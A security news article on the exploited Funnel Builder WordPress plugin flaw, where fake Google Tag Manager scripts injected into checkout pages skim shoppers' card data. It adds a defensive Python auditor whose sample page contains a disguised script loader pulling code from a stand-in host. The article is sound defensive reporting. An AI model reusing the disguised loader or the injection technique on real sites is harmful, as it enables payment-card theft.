A severe security vulnerability in the WordPress plugin Funnel Builder is being actively exploited in real-world attacks to inject malicious scripts into WooCommerce checkout pages, enabling attackers to steal sensitive payment information from online shoppers.
The flaw impacts the Funnel Builder plugin developed by FunnelKit Funnel Builder and is present in all versions prior to 3.15.0.3. Security researchers say the plugin is used by more than 40,000 e-commerce websites worldwide.
Unauthenticated Access Enables Script Injection
Cybersecurity researchers at Sansec report that the vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into checkout pages. This is achieved through a poorly secured internal function exposed via a public endpoint that fails to verify user permissions.
As a result, attackers can directly write malicious code into plugin settings that are automatically loaded on every checkout page.
The issue has been patched in version 3.15.0.3, and site administrators are strongly advised to update immediately.
Fake Analytics Scripts Used to Hide Skimmers
Attackers are disguising malicious payloads as legitimate tracking tools, such as Google Tag Manager scripts, making them difficult to detect during routine security checks.
Once injected, the scripts silently activate a payment skimmer that captures sensitive customer data, including credit card numbers, CVV codes, billing addresses, and other checkout details.
In some observed cases, the injected code connects to external infrastructure and establishes communication with attacker-controlled command-and-control (C2) servers to retrieve updated skimming instructions tailored to each compromised website.
How the Attack Works
According to researchers, the vulnerability stems from an exposed checkout endpoint that allows internal methods to be triggered without authentication or authorization checks. This design flaw enables attackers to submit specially crafted requests that overwrite plugin configuration settings.
The malicious code is then stored in the plugin’s “External Scripts” configuration field, whose contents are loaded and executed on every checkout page.
Security analysts warn that this type of weakness provides a direct path for “Magecart-style” attacks, where payment skimmers are deployed across legitimate e-commerce platforms.
Payment Skimming Campaign Targets WooCommerce Stores
The ongoing campaign is part of a broader trend of web-based payment theft operations targeting e-commerce platforms powered by WooCommerce, a widely used WordPress plugin ecosystem.
Experts note that attackers are increasingly using legitimate-looking analytics tags to blend into normal website behavior, reducing the likelihood of detection by site owners and security tools.
Security Recommendations for Website Owners
Security teams recommend that administrators take immediate action to mitigate the risk:
- Upgrade Funnel Builder to version 3.15.0.3 or later
- Review plugin settings under “Settings > Checkout > External Scripts” for unknown or suspicious entries
- Remove any unauthorized scripts or tracking code
- Monitor checkout pages for unusual JavaScript activity or external network calls
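One way to carry out the last two checks offline, as an added example that is not from the article, Sansec, or FunnelKit: it parses a saved copy of a checkout page, flags script loaders on hosts outside an assumed per-site allowlist, and flags inline scripts that present themselves as Google Tag Manager while pulling code from a host that is not on that list. The allowlist, the sample page, and the function and host names are constructed placeholders for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed per-site allowlist of hosts the checkout page may load scripts from.
ALLOWED_HOSTS = {"shop.example", "www.googletagmanager.com"}
GTM_MARKERS = ("googletagmanager", "google tag manager")
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

class ScriptCollector(HTMLParser):
    """Collects every <script> as (src attribute or None, inline body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._buf = [], None, None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src, self._buf = dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None

def audit_checkout_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (finding_kind, host) pairs for scripts that deserve review."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:  # external loader: anything outside the allowlist is a finding
            host = urlparse(src).hostname
            if host and host not in allowed_hosts:
                findings.append(("unknown-src", host))
        else:  # inline: a GTM-looking snippet fetching code from an unknown host
            kind = "fake-gtm-inline" if any(m in body.lower() for m in GTM_MARKERS) else "inline-external"
            for host in sorted({h.lower() for h in HOST_RE.findall(body)} - allowed_hosts):
                findings.append((kind, host))
    return findings

# Constructed sample: two legitimate loaders, a fake "Google Tag Manager" inline
# snippet, and a protocol-relative loader on an unknown host.
SAMPLE_CHECKOUT_HTML = """<html><body>
<script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/checkout.min.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=GTM-EXAMPLE"></script>
<script>// Google Tag Manager
var s=document.createElement('script');s.src='https://stats-gtm.example.net/gtm.js';document.head.appendChild(s);</script>
<script src="//cdn-metrics.example.org/collect.js"></script></body></html>"""
```

Running `audit_checkout_html(SAMPLE_CHECKOUT_HTML)` reports the fake GTM snippet and the unknown loader while the two allowlisted scripts pass; a real run would feed it the HTML of each checkout page on a schedule and alert on any new finding.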
Broader Trend of Website Supply Chain Attacks
The incident reflects a growing wave of attacks targeting content management systems and plugins to gain access to high-traffic websites. Similar campaigns have been observed in other platforms, including Joomla-based sites, where attackers deploy remote loaders to dynamically serve malicious content and spam.
Security researchers warn that these evolving techniques allow attackers to modify website behavior in real time without further access to the compromised system.
Conclusion
The exploitation of the Funnel Builder vulnerability highlights the continued risk posed by insecure plugin architectures in widely used web platforms. With attackers actively targeting checkout systems to harvest financial data, prompt patching and continuous monitoring remain critical for e-commerce site operators.